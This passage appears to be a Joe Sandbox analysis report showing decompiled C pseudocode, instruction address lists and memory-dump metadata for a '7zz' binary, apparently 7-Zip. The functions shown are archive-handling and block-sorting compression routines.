												 *((intOrPtr*)(_t226 - 0x38)) = 0x47ab80;
												 *(_t226 - 4) = 1;
												E0042D850(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
												_t177 = 0;
												__eflags =  *(_t223 + 8);
												 *(_t226 + 0x10) = 0;
												if( *(_t223 + 8) <= 0) {
													L47:
													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
													E00408604(_t226 - 0x38);
													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
													E00408604(_t226 - 0x4c);
													_t175 =  *((intOrPtr*)(_t226 - 0x14));
													goto L50;
												} else {
													goto L40;
												}
												do {
													L40:
													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
													__eflags = _t148 - 1;
													if(_t148 != 1) {
														L43:
														__eflags = _t148;
														if(_t148 <= 0) {
															goto L46;
														}
														_t218 = _t148;
														do {
															L0043AC2F( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
															E00415C6D( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
															_t218 = _t218 - 1;
															__eflags = _t218;
														} while (_t218 != 0);
														goto L46;
													}
													__eflags =  *((char*)(_t217 + 0x54));
													if( *((char*)(_t217 + 0x54)) == 0) {
														goto L43;
													}
													L0043AC2F( *((intOrPtr*)(_t226 + 0x14)), _t148);
													E00415C6D( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
													L46:
													_t177 = _t177 + 1;
													__eflags = _t177 -  *(_t223 + 8);
												} while (_t177 <  *(_t223 + 8));
												goto L47;
											} else {
												 *(_t226 + 0x10) =  *(_t184 + 0xc);
												do {
													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
													__eflags = _t201 - 1;
													if(_t201 != 1) {
														L34:
														_t64 = _t226 - 0x10;
														 *_t64 =  *(_t226 - 0x10) + _t201;
														__eflags =  *_t64;
														goto L35;
													}
													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
													__eflags =  *((char*)(_t159 + 0x54));
													if( *((char*)(_t159 + 0x54)) != 0) {
														goto L35;
													}
													goto L34;
													L35:
													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
													_t211 = _t211 + 1;
													__eflags = _t211 - _t215;
												} while (_t211 < _t215);
												L36:
												_t211 = 0;
												__eflags = 0;
												goto L37;
											}
										} else {
											goto L18;
										}
										do {
											L18:
											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
											__eflags = _t162 - _t211;
											if(_t162 == _t211) {
												goto L26;
											}
											__eflags = _t162 - 1;
											 *(_t226 - 0x24) = _t211;
											 *(_t226 - 0x20) = _t211;
											if(_t162 <= 1) {
												L25:
												_t164 = E00429826( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
												asm("sbb edx, [ebp-0x20]");
												L0042389F( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
												_t184 =  *((intOrPtr*)(_t226 + 0xc));
												_t211 = 0;
												__eflags = 0;
												goto L26;
											}
											_t167 = _t162 - 1;
											__eflags = _t167;
											 *(_t226 + 8) = _t167;
											do {
												__eflags =  *(_t226 - 0x1c) - 9;
												if( *(_t226 - 0x1c) == 9) {
													__eflags =  *(_t226 - 0x18) - _t211;
													if( *(_t226 - 0x18) == _t211) {
														_t219 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
														L0042389F( *(_t226 + 0x10), _t219, _t211);
														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
														_t214 =  *(_t226 - 0x10);
														asm("adc [ebp-0x20], ebx");
														_t175 =  *((intOrPtr*)(_t226 - 0x14));
														_t211 = 0;
														__eflags = 0;
													}
												}
												_t36 = _t226 + 8;
												 *_t36 =  *(_t226 + 8) - 1;
												__eflags =  *_t36;
											} while ( *_t36 != 0);
											goto L25;
											L26:
											_t214 = _t214 + 1;
											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
											 *(_t226 - 0x10) = _t214;
										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
										goto L27;
									}
									_t220 = 0;
									__eflags =  *(_t223 + 8) - _t211;
									if( *(_t223 + 8) <= _t211) {
										goto L17;
									} else {
										goto L15;
									}
									do {
										L15:
										E00415C6D( *((intOrPtr*)(_t226 + 0xc)), 1);
										_t220 = _t220 + 1;
										__eflags = _t220 -  *(_t223 + 8);
									} while (_t220 <  *(_t223 + 8));
									_t211 = 0;
									__eflags = 0;
									goto L17;
								}
								E0042D192( *((intOrPtr*)(_t175 + 0x18)), _t211);
								while(1) {
									_t133 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
									_t183 = _t211;
									 *(_t226 - 0x1c) = _t133;
									 *(_t226 - 0x18) = _t183;
									if(_t133 != 0xd) {
										goto L6;
									}
									goto L2;
								}
								goto L6;
							}
							__eflags = _t183 - _t211;
							if(_t183 == _t211) {
								goto L13;
							}
							goto L11;
						}
						__eflags = _t183 - _t211;
						if(_t183 == _t211) {
							goto L13;
						}
						goto L9;
					}
					_t221 = 0;
					if( *(_t223 + 8) <= 0) {
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E00415C6D( *((intOrPtr*)(_t226 + 0xc)), E0042D241(0));
						_t221 = _t221 + 1;
					} while (_t221 <  *(_t223 + 8));
					continue;
					L6:
					_t211 = 0;
					__eflags = 0;
					goto L7;
				}
			}






























                                                                                                                                    0x0042dbb6
                                                                                                                                    0x0042dbbb
                                                                                                                                    0x0042dbc4
                                                                                                                                    0x0042dbcb
                                                                                                                                    0x0042dbce
                                                                                                                                    0x0042dbd3
                                                                                                                                    0x0042dbdc
                                                                                                                                    0x0042dbe1
                                                                                                                                    0x0042dbe4
                                                                                                                                    0x0042dbe9
                                                                                                                                    0x0042dbee
                                                                                                                                    0x0042dbf1
                                                                                                                                    0x0042dbf4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dbf6
                                                                                                                                    0x0042dbf6
                                                                                                                                    0x0042dbfa
                                                                                                                                    0x0042dc1e
                                                                                                                                    0x0042dc1e
                                                                                                                                    0x0042dc21
                                                                                                                                    0x0042dc27
                                                                                                                                    0x0042dc27
                                                                                                                                    0x0042dc2a
                                                                                                                                    0x0042dc30
                                                                                                                                    0x0042dc30
                                                                                                                                    0x0042dc32
                                                                                                                                    0x0042dc3e
                                                                                                                                    0x0042dc3e
                                                                                                                                    0x0042dc41
                                                                                                                                    0x0042dc44
                                                                                                                                    0x0042dc5f
                                                                                                                                    0x0042dc5f
                                                                                                                                    0x0042dc62
                                                                                                                                    0x0042dc64
                                                                                                                                    0x0042dc67
                                                                                                                                    0x0042dc6a
                                                                                                                                    0x0042dce2
                                                                                                                                    0x0042dce2
                                                                                                                                    0x0042dce6
                                                                                                                                    0x0042dce8
                                                                                                                                    0x0042dceb
                                                                                                                                    0x0042dcf0
                                                                                                                                    0x0042dcf5
                                                                                                                                    0x0042dcf8
                                                                                                                                    0x0042dcfb
                                                                                                                                    0x0042dcfe
                                                                                                                                    0x0042dcfe
                                                                                                                                    0x0042dcfe
                                                                                                                                    0x0042dceb
                                                                                                                                    0x0042dd00
                                                                                                                                    0x0042dd03
                                                                                                                                    0x0042dd06
                                                                                                                                    0x0042dd08
                                                                                                                                    0x0042dd0b
                                                                                                                                    0x0042dd37
                                                                                                                                    0x0042dd37
                                                                                                                                    0x0042dd3a
                                                                                                                                    0x0042dd3d
                                                                                                                                    0x0042de1f
                                                                                                                                    0x0042de1f
                                                                                                                                    0x0042de1f
                                                                                                                                    0x0042de22
                                                                                                                                    0x0042de3f
                                                                                                                                    0x0042de42
                                                                                                                                    0x0042de45
                                                                                                                                    0x0042de6b
                                                                                                                                    0x0042de71
                                                                                                                                    0x0042de79
                                                                                                                                    0x0042de79
                                                                                                                                    0x0042de4a
                                                                                                                                    0x0042de52
                                                                                                                                    0x0042de57
                                                                                                                                    0x0042de5a
                                                                                                                                    0x0042de5c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042de5e
                                                                                                                                    0x0042de5e
                                                                                                                                    0x0042de63
                                                                                                                                    0x0042de68
                                                                                                                                    0x0042de68
                                                                                                                                    0x0042de68
                                                                                                                                    0x00000000
                                                                                                                                    0x0042de5e
                                                                                                                                    0x0042de27
                                                                                                                                    0x0042de2c
                                                                                                                                    0x0042de34
                                                                                                                                    0x0042de37
                                                                                                                                    0x00000000
                                                                                                                                    0x0042de37
                                                                                                                                    0x0042dd43
                                                                                                                                    0x0042dd46
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dd4c
                                                                                                                                    0x0042dd4f
                                                                                                                                    0x0042dd52
                                                                                                                                    0x0042dd55
                                                                                                                                    0x0042dd5c
                                                                                                                                    0x0042dd63
                                                                                                                                    0x0042dd66
                                                                                                                                    0x0042dd69
                                                                                                                                    0x0042dd6c
                                                                                                                                    0x0042dd6f
                                                                                                                                    0x0042dd76
                                                                                                                                    0x0042dd87
                                                                                                                                    0x0042dd8e
                                                                                                                                    0x0042dd93
                                                                                                                                    0x0042dd95
                                                                                                                                    0x0042dd98
                                                                                                                                    0x0042dd9b
                                                                                                                                    0x0042de02
                                                                                                                                    0x0042de02
                                                                                                                                    0x0042de09
                                                                                                                                    0x0042de0e
                                                                                                                                    0x0042de15
                                                                                                                                    0x0042de1a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dd9d
                                                                                                                                    0x0042dd9d
                                                                                                                                    0x0042dda6
                                                                                                                                    0x0042dda9
                                                                                                                                    0x0042ddac
                                                                                                                                    0x0042ddaf
                                                                                                                                    0x0042ddcd
                                                                                                                                    0x0042ddcd
                                                                                                                                    0x0042ddcf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ddd1
                                                                                                                                    0x0042ddd3
                                                                                                                                    0x0042dde0
                                                                                                                                    0x0042ddf1
                                                                                                                                    0x0042ddf6
                                                                                                                                    0x0042ddf9
                                                                                                                                    0x0042ddf9
                                                                                                                                    0x0042ddf9
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ddd3
                                                                                                                                    0x0042ddb1
                                                                                                                                    0x0042ddb5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ddbb
                                                                                                                                    0x0042ddc6
                                                                                                                                    0x0042ddfc
                                                                                                                                    0x0042ddfc
                                                                                                                                    0x0042ddfd
                                                                                                                                    0x0042ddfd
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dd0d
                                                                                                                                    0x0042dd10
                                                                                                                                    0x0042dd13
                                                                                                                                    0x0042dd16
                                                                                                                                    0x0042dd19
                                                                                                                                    0x0042dd1c
                                                                                                                                    0x0042dd2a
                                                                                                                                    0x0042dd2a
                                                                                                                                    0x0042dd2a
                                                                                                                                    0x0042dd2a
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dd2a
                                                                                                                                    0x0042dd21
                                                                                                                                    0x0042dd24
                                                                                                                                    0x0042dd28
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dd2d
                                                                                                                                    0x0042dd2d
                                                                                                                                    0x0042dd30
                                                                                                                                    0x0042dd31
                                                                                                                                    0x0042dd31
                                                                                                                                    0x0042dd35
                                                                                                                                    0x0042dd35
                                                                                                                                    0x0042dd35
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dd35
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc6c
                                                                                                                                    0x0042dc6c
                                                                                                                                    0x0042dc6f
                                                                                                                                    0x0042dc72
                                                                                                                                    0x0042dc74
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc76
                                                                                                                                    0x0042dc79
                                                                                                                                    0x0042dc7c
                                                                                                                                    0x0042dc7f
                                                                                                                                    0x0042dcb9
                                                                                                                                    0x0042dcbf
                                                                                                                                    0x0042dcca
                                                                                                                                    0x0042dccf
                                                                                                                                    0x0042dcd4
                                                                                                                                    0x0042dcd7
                                                                                                                                    0x0042dcd7
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dcd7
                                                                                                                                    0x0042dc81
                                                                                                                                    0x0042dc81
                                                                                                                                    0x0042dc82
                                                                                                                                    0x0042dc85
                                                                                                                                    0x0042dc85
                                                                                                                                    0x0042dc89
                                                                                                                                    0x0042dc8b
                                                                                                                                    0x0042dc8e
                                                                                                                                    0x0042dc9d
                                                                                                                                    0x0042dca1
                                                                                                                                    0x0042dca6
                                                                                                                                    0x0042dca9
                                                                                                                                    0x0042dcac
                                                                                                                                    0x0042dcaf
                                                                                                                                    0x0042dcb2
                                                                                                                                    0x0042dcb2
                                                                                                                                    0x0042dcb2
                                                                                                                                    0x0042dc8e
                                                                                                                                    0x0042dcb4
                                                                                                                                    0x0042dcb4
                                                                                                                                    0x0042dcb4
                                                                                                                                    0x0042dcb4
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dcd9
                                                                                                                                    0x0042dcd9
                                                                                                                                    0x0042dcda
                                                                                                                                    0x0042dcdd
                                                                                                                                    0x0042dcdd
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc6c
                                                                                                                                    0x0042dc46
                                                                                                                                    0x0042dc48
                                                                                                                                    0x0042dc4b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc4d
                                                                                                                                    0x0042dc4d
                                                                                                                                    0x0042dc52
                                                                                                                                    0x0042dc57
                                                                                                                                    0x0042dc58
                                                                                                                                    0x0042dc58
                                                                                                                                    0x0042dc5d
                                                                                                                                    0x0042dc5d
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc5d
                                                                                                                                    0x0042dc37
                                                                                                                                    0x0042dbe1
                                                                                                                                    0x0042dbe4
                                                                                                                                    0x0042dbe9
                                                                                                                                    0x0042dbee
                                                                                                                                    0x0042dbf1
                                                                                                                                    0x0042dbf4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dbf4
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dbe1
                                                                                                                                    0x0042dc2c
                                                                                                                                    0x0042dc2e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc2e
                                                                                                                                    0x0042dc23
                                                                                                                                    0x0042dc25
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc25
                                                                                                                                    0x0042dbfc
                                                                                                                                    0x0042dc01
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc03
                                                                                                                                    0x0042dc03
                                                                                                                                    0x0042dc0f
                                                                                                                                    0x0042dc14
                                                                                                                                    0x0042dc15
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc1c
                                                                                                                                    0x0042dc1c
                                                                                                                                    0x0042dc1c
                                                                                                                                    0x00000000
                                                                                                                                    0x0042dc1c

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 2efe874e0d54bcc63b88533e8d0e92cc829ab34bf8cfbc3d7771b8826d61e310
                                                                                                                                    • Instruction ID: f0c02de7351495f9103b866f9f83217b28a37e7e00b398bfa100c8a62c2efe4d
                                                                                                                                    • Opcode Fuzzy Hash: 2efe874e0d54bcc63b88533e8d0e92cc829ab34bf8cfbc3d7771b8826d61e310
                                                                                                                                    • Instruction Fuzzy Hash: D2A14D70E006199FCB18DF56D8919AEB7B2FF94304F64842EE4159B351DB38AD81CB88
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00459170 Relevance: 1.6, Strings: 1, Instructions: 333COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E00459170(void* __ecx, signed char* __edx) {
				void* _t195;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				signed int _t207;
				signed int _t210;
				signed int _t214;
				signed int* _t216;
				void* _t219;
				void* _t226;
				intOrPtr _t231;
				void* _t242;
				void* _t244;
				void* _t246;
				void* _t248;
				signed char _t249;
				signed int _t252;
				signed int _t256;
				signed int _t257;
				intOrPtr _t260;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t272;
				signed char* _t291;
				signed int _t292;
				signed int* _t294;
				signed int _t296;
				intOrPtr _t297;
				signed int _t305;
				signed int _t310;
				signed int _t315;
				signed int _t320;
				unsigned int _t327;
				void* _t328;
				signed int* _t331;
				signed int _t332;
				void* _t339;
				signed int _t340;
				signed int _t344;
				void* _t345;
				signed int _t346;
				unsigned int _t349;
				intOrPtr _t350;
				signed int _t354;
				void* _t363;
				void* _t364;

				_t291 = __edx;
				_t346 =  *(_t363 + 0x24);
				_t226 = __ecx;
				_t339 = __ecx + _t346 * 4;
				_t195 = memset(_t339, 0, 0x10000 << 2);
				_t364 = _t363 + 0xc;
				_t327 = _t346 - 1;
				 *(_t364 + 0x18) = _t339;
				 *(_t364 + 0x24) = _t327;
				if(_t327 != 0) {
					do {
						 *((intOrPtr*)(_t339 + ((_t291[_t195] & 0x000000ff) << 0x00000008 | _t291[_t195 + 1] & 0x000000ff) * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t195] & 0x000000ff) << 0x00000008 | _t291[_t195 + 1] & 0x000000ff) * 4)) + 1;
						_t195 = _t195 + 1;
					} while (_t195 < _t327);
				}
				 *((intOrPtr*)(_t339 + (( *(_t195 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4)) =  *((intOrPtr*)(_t339 + (( *(_t195 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4)) + 1;
				_t328 = 0;
				_t200 = 0;
				do {
					_t231 =  *((intOrPtr*)(_t339 + _t200 * 4));
					if(_t231 != 0) {
						_t328 = _t328 + _t231;
					}
					 *((intOrPtr*)(_t339 + _t200 * 4)) = _t328 - _t231;
					_t200 = _t200 + 1;
				} while (_t200 < 0x10000);
				_t349 =  *(_t364 + 0x24);
				_t201 = 0;
				if(_t349 != 0) {
					do {
						 *((intOrPtr*)(_t339 + 0x40000 + _t201 * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t201] & 0x000000ff) << 0x00000008 | _t291[_t201 + 1] & 0x000000ff) * 4));
						_t201 = _t201 + 1;
					} while (_t201 < _t349);
				}
				 *((intOrPtr*)(_t339 + 0x40000 + _t201 * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t201] & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4));
				_t202 = 0;
				if(_t349 != 0) {
					do {
						 *((intOrPtr*)(_t226 +  *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) * 4)) = _t202;
						 *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) =  *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) + 1;
						_t202 = _t202 + 1;
					} while (_t202 < _t349);
				}
				 *((intOrPtr*)(_t226 +  *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) * 4)) = _t202;
				 *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) =  *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) + 1;
				_t207 = 0;
				_t331 = _t339 + 8;
				 *(_t364 + 0x14) = 0x4000;
				do {
					_t242 =  *(_t331 - 8) - _t207;
					if(_t242 != 0) {
						_t272 = _t242 - 1;
						if(_t272 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t272 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t320 =  *(_t226 + _t207 * 4);
							if(_t272 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t320 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t272 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *(_t331 - 8);
					}
					_t244 =  *(_t331 - 4) - _t207;
					if(_t244 != 0) {
						_t269 = _t244 - 1;
						if(_t269 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t269 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t315 =  *(_t226 + _t207 * 4);
							if(_t269 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t315 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t269 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *(_t331 - 4);
					}
					_t246 =  *_t331 - _t207;
					if(_t246 != 0) {
						_t266 = _t246 - 1;
						if(_t266 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t266 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t310 =  *(_t226 + _t207 * 4);
							if(_t266 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t310 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t266 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *_t331;
					}
					_t248 = _t331[1] - _t207;
					if(_t248 != 0) {
						_t263 = _t248 - 1;
						if(_t263 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t263 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t305 =  *(_t226 + _t207 * 4);
							if(_t263 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t305 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t263 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 = _t331[1];
					}
					_t331 =  &(_t331[4]);
					_t123 = _t364 + 0x14;
					 *_t123 =  *(_t364 + 0x14) - 1;
				} while ( *_t123 != 0);
				_t249 = 0;
				if(_t349 != 0) {
					do {
						_t249 = _t249 + 1;
					} while (_t349 >> _t249 != 0);
				}
				 *((intOrPtr*)(_t364 + 0x20)) = 0x20;
				if(0x20 - _t249 > 0xc) {
					 *((intOrPtr*)(_t364 + 0x20)) = 0xc;
				}
				 *(_t364 + 0x14) = 2;
				while(1) {
					_t332 = 0;
					_t350 = 0;
					 *((intOrPtr*)(_t364 + 0x10)) = 0;
					 *(_t364 + 0x24) = 0;
					if( *((intOrPtr*)(_t364 + 0x2c)) <= 0) {
						break;
					} else {
						goto L40;
					}
					do {
						L40:
						_t214 =  *(_t226 + _t332 * 4);
						_t294 = _t226 + _t332 * 4;
						_t344 = _t214 >> 0x00000014 & 0x000003ff;
						_t256 =  !(_t214 >> 0x1f) & 0x00000001;
						if((_t214 & 0x40000000) != 0) {
							_t344 = _t344 + (_t294[1] >> 0x0000000a & 0x003ffc00);
							_t294[1] = _t294[1] & 0x000fffff;
							_t350 =  *((intOrPtr*)(_t364 + 0x10));
						}
						_t345 = _t344 + 1;
						 *_t294 = _t214 & 0x000fffff;
						if(_t256 != 0 || _t345 == 1) {
							_t296 = _t332 - _t350;
							 *(_t226 + _t296 * 4) =  *(_t226 + _t296 * 4) & 0x000fffff;
							_t216 = _t226 + _t296 * 4;
							if(_t350 > 1) {
								_t216[1] = _t216[1] & 0x000fffff;
							}
							_t297 = _t345 + _t350;
							_t166 = _t297 - 1; // -1
							_t257 = _t166;
							 *_t216 =  *_t216 | (_t257 & 0x000003ff) << 0x00000014;
							_t354 =  *_t216;
							if(_t297 > 0x400) {
								_t216[1] = _t216[1] | (_t257 & 0xfffffc00) << 0x0000000a;
								 *_t216 = _t354 | 0x40000000;
							}
							_t350 = _t297;
							 *((intOrPtr*)(_t364 + 0x10)) = _t350;
						} else {
							_t260 =  *((intOrPtr*)(_t364 + 0x2c));
							_t350 = 0;
							 *((intOrPtr*)(_t364 + 0x10)) = 0;
							if( *(_t364 + 0x14) < _t260) {
								_push(_t260);
								_push(0);
								_push(_t226);
								_push( *((intOrPtr*)(_t364 + 0x20)));
								_push(_t345);
								_push(_t332);
								if(E00458D60(_t260,  *(_t364 + 0x14)) != 0) {
									 *(_t364 + 0x24) = _t345 + _t332;
								}
							} else {
								_t219 = 0;
								if(_t345 != 0) {
									 *(_t364 + 0x1c) = _t294;
									do {
										 *((intOrPtr*)( *(_t364 + 0x18) + 0x40000 +  *_t294 * 4)) = _t219 + _t332;
										_t219 = _t219 + 1;
										_t294 =  &(( *(_t364 + 0x1c))[1]);
										 *(_t364 + 0x1c) = _t294;
									} while (_t219 < _t345);
									_t350 =  *((intOrPtr*)(_t364 + 0x10));
								}
							}
						}
						_t332 = _t332 + _t345;
					} while (_t332 <  *((intOrPtr*)(_t364 + 0x2c)));
					_t339 =  *(_t364 + 0x18);
					if( *(_t364 + 0x24) != 0) {
						 *(_t364 + 0x14) =  *(_t364 + 0x14) << 1;
						continue;
					}
					break;
				}
				_t210 = 0;
				if( *((intOrPtr*)(_t364 + 0x2c)) <= 0) {
					return  *((intOrPtr*)(_t339 + 0x40000));
				} else {
					do {
						_t340 =  *(_t226 + _t210 * 4);
						_t252 = _t340 >> 0x00000014 & 0x000003ff;
						if((_t340 & 0x40000000) != 0) {
							_t292 =  *(_t226 + 4 + _t210 * 4);
							_t252 = _t252 + (_t292 >> 0x0000000a & 0x003ffc00);
							 *(_t226 + 4 + _t210 * 4) = _t292 & 0x000fffff;
						}
						 *(_t226 + _t210 * 4) = _t340 & 0x000fffff;
						_t210 = _t210 + _t252 + 1;
					} while (_t210 <  *((intOrPtr*)(_t364 + 0x2c)));
					return  *((intOrPtr*)( *(_t364 + 0x18) + 0x40000));
				}
			}


















































                                                                                                                                    0x00459170
                                                                                                                                    0x00459175
                                                                                                                                    0x00459179
                                                                                                                                    0x0045917d
                                                                                                                                    0x00459189
                                                                                                                                    0x00459189
                                                                                                                                    0x0045918b
                                                                                                                                    0x0045918e
                                                                                                                                    0x00459192
                                                                                                                                    0x00459198
                                                                                                                                    0x004591a0
                                                                                                                                    0x004591ae
                                                                                                                                    0x004591b4
                                                                                                                                    0x004591b5
                                                                                                                                    0x004591a0
                                                                                                                                    0x004591c5
                                                                                                                                    0x004591cb
                                                                                                                                    0x004591cd
                                                                                                                                    0x004591d0
                                                                                                                                    0x004591d0
                                                                                                                                    0x004591d5
                                                                                                                                    0x004591d7
                                                                                                                                    0x004591d7
                                                                                                                                    0x004591dd
                                                                                                                                    0x004591e0
                                                                                                                                    0x004591e1
                                                                                                                                    0x004591e8
                                                                                                                                    0x004591ec
                                                                                                                                    0x004591f0
                                                                                                                                    0x004591f2
                                                                                                                                    0x00459203
                                                                                                                                    0x0045920a
                                                                                                                                    0x0045920b
                                                                                                                                    0x004591f2
                                                                                                                                    0x0045921e
                                                                                                                                    0x00459225
                                                                                                                                    0x00459229
                                                                                                                                    0x00459230
                                                                                                                                    0x00459241
                                                                                                                                    0x00459252
                                                                                                                                    0x00459258
                                                                                                                                    0x00459259
                                                                                                                                    0x00459230
                                                                                                                                    0x0045926c
                                                                                                                                    0x0045927b
                                                                                                                                    0x00459281
                                                                                                                                    0x00459283
                                                                                                                                    0x00459286
                                                                                                                                    0x00459290
                                                                                                                                    0x00459293
                                                                                                                                    0x00459295
                                                                                                                                    0x00459297
                                                                                                                                    0x00459298
                                                                                                                                    0x004592ab
